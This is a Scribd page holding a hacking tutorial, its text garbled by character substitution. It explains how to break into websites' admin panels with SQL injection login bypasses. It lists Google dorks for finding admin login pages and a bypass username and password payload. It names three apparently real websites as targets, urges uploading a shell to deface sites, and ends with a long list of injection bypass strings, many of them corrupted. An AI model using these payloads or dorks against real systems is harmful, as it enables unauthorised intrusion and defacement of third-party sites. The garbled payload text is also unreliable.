Scribd
Upload
6K views3 pages

Hack Website's Admin

This document provides instructions on how to hack into a website's admin panel using basic SQL injection. It explains finding target websites using Google dorks searching for common admin login pages. It then demonstrates bypassing the admin login by entering "or 1=1" or similar SQL queries as the username and password. Once in the admin panel, the instructions say to upload a shell to gain further access to deface the site. Example target websites are also provided.

Uploaded by

SóiHoang
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
6K views3 pages

Hack Website's Admin

This document provides instructions on how to hack into a website's admin panel using basic SQL injection. It explains finding target websites using Google dorks searching for common admin login pages. It then demonstrates bypassing the admin login by entering "or 1=1" or similar SQL queries as the username and password. Once in the admin panel, the instructions say to upload a shell to gain further access to deface the site. Example target websites are also provided.

Uploaded by

SóiHoang
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

Hack Website's Admin Panel using Basic SQL Injection

You might have seen hackers hacking and defaceing


websites, editing it with their own stuff, makeing post on
websites etc. There are many methods of doing this, In this
tutorial I will be showing you a very basic and simply SQLi
Structured Query Language In!ection". I will show you how to
find the websites admin panel using a simple google dork and
a SQL #uery to bypass the admin user name and password
and enter into the panel. $hen you are in the panel !ust find a
upload option and upload your shell, then deface it.
%orks& inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx
' Try to make your own dorks also to get more success rate.
(undreds of sites will open up having )adminlogin.asp* in their
+,L. Select any website, you will get the area from where the
admins login. -ill the details as&
+ser& ./or/./0/.
1assword& ./or/./0/.
+se the above mentioned login details and you will be into the
admin panel of a website. I will not work for all the websites
you will find, but will work on most of the website.
Some websites which I got&
http&))gimtech.in)$ebadmin)2dminLogin.asp*
http&))welkinindiagroup.com)admin)adminlogin.asp*
http&))nobinsolutions.com)2dminlogin.asp*
Other InjecTion Queries:
3 or .0. 4
./or5./05.
admin54
6 or 707 4
or 707 4
3 or 707 '
6 or 707 '
or 707 '
3 or 3*50/*
6 or 8*606*
3" or 3*50/*
3 or .0.4
6 or .0.4
or .0.4
3 or a0a4
6 or 8a606a
3" or 3a50/a
8" or 8a606a
hi6 or 8a606a
hi6 or .0. 4
hi5 or .0. 4
hi5 or 3a50/a
hi5" or 3a50/a
hi6" or 8a606"

You might also like